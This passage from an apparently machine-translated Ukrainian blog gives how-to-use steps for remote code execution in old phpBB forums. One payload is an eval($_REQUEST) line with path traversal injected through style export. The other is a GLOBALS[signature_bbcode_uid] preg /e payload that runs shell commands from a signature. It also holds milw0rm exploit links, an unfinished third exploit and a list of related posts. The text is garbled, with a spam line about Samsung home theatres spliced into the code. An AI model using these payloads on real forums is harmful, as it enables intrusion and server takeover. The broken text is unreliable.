« Оптимізація шаблонів форуму phpBB | phpBB - огляд форумного движка »
a=12;eval($_REQUEST[kiborg]);exit(0);//../../../../../../../tmp/Мы створили стиль, тепер треба його експортувати у форум. Тиснемо посилання “Експорт”, там буде струму поточний стиль, правимо сурс, міняємо його на
Код:
a=12;eval($_REQUEST[kiborg]);exit(0);//../../../../../../../tmp/В теці /tmp/ з’явитися файл theme_info.cfg.
Заходивши по посиланню
http://localhost/phpbb13/admin/admin…org=phpinfo();
нам покажеться phpinfo();
Exploit: http://milw0rm.com/exploits/1247
3) Бага в профайле signature_bbcode_uid (Потрібний юзер, з будь-якими правами).
Як юзать: Означає регаємся на форумі, заходимо в профайл. Правимо сторінку..
Код:
<form action=”profile.php” enctype=”multipart/form-data” method=”post”>меняем на
Код:
Монтаж и настройка, домашние кинотеатры samsung.
<form action=”profile.php?GLOBALS[signature_bbcode_uid]=(.%2B)/e%00″ enctype=”multipart/form-data” method=”post”>В підпис(Signature) сунемо таку беку
Код:
kibi:`ls`Вообщем, спочатку будь-яке слово, потім двокрапка,а після нього php код. Вставляємо, зберігаємо, повземо назад в профайл, і ніжно іздихаєм, від результатів.
Бага настока рідкісна, що просто охренеть.
Для неї умови
# 1. PHP 5 < 5.0.5
# 2. register_globals=On
# 3. magic_quotes off
ЦЕ ДУЖЕ РІДКІСНЕ поєднання, тому не дивуйтеся, якщо орати не буде.
Exploit: http://milw0rm.com/exploits/1388
4) Після того, як “залатали” багу (3), виявилося, що залатали, висновок в профайл, а сама бага жива. (Потрібні адмінськіє має рацію).
Video: http://video.antichat.ru/file178.html
Ця бага прісутсвуєт, майже на всіх форумах, її рідко де залатали.
Як юзать:
Створюємо текстовий файл 1.sql сунемо в нього код
Код:
Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13 14
Tags:
версія,
код,
пошук,
уразливість,
файл,
форум,
шелл
Схожі записи
- Вебмастеру vBulletin - движок конференції Установка (01.03.2009)
... Хакі і аддони
6. Аутро
Перший крок ви зробили, вирішивши завести свою борду, другий крок потрібно зробити зараз, вибравши ту, яку використовуватимете далі.
Вибір величезний: перераховуємо і загинаємо пальці - Ultimate Bulletin Board від Infopop.com, IkonBoard від Jarvis (Ikonboard.com), vBulletin від Jelsoft(vBulletin.com), а ...
- Скрипт форуму на PHP своїми руками Частина 6 (20.02.2009)
Функція lockTheme()
Функція unlockTheme()
Функція getEditThemeForm() повертає форму для редагування теми.
Обробник форми - функція updateTheme().
- Автомобілі і мотоцикли (08.04.2009)
... tucson-club.ru/forum/
PageRank: 0/10
Клуб любителів PEUGEOT
Тут спілкуються поклонники PEUGEOT. Офіційний ділер PEUGEOT - компанія АРМАНД запрошує!
http://www.armand.ru/vb/
PageRank: 0/10
Клуб любителів BMW
Все про BMW і MINI в Росії і в світі. Новини, чутки, шпигунські фото, нові моделі, офіційні ділери, і інша корисна інформація. Форум підтримується компанією "АВТОБУДИНОК".
http://www.bmwclub.ru/vb/
PageRank: 3/10
Центральний Мото Форум
Форум про мотоцикли і мотоциклістів, мотоспорт і мотомагазини. Мотолітература і мотоігри. ...
- Веб форуми - огляд (12.04.2009)
...
Зауваження:
Власне не варто забувати, що гвестбуки є прародителями сучасних форумів. А сама система побудови сучасних форумів була запропонована в UBB.
Увага:
Знаючи що, є люди що хочуть об'єднати все і вся, я украй не рекомендую використовувати і форум і guestbook на Ваших сайтах одночасно. До речі це ...
- Продуктивність і оптимізація скрипта vBulletin FAQ (28.02.2009)
... MYSQL Fulltext набагато швидше за рідний пошук vbulletin, крім того, економиться розмір БД, за рахунок видалення таблиць postindex і searchindex.
Оптимізація настройок движка (Лінійка 3.6.x)
Нижче представлений перелік опцій і настройок, які уповільнюють роботу форуму. При виникненні проблем з продуктивністю на них слід звернути увагу в ...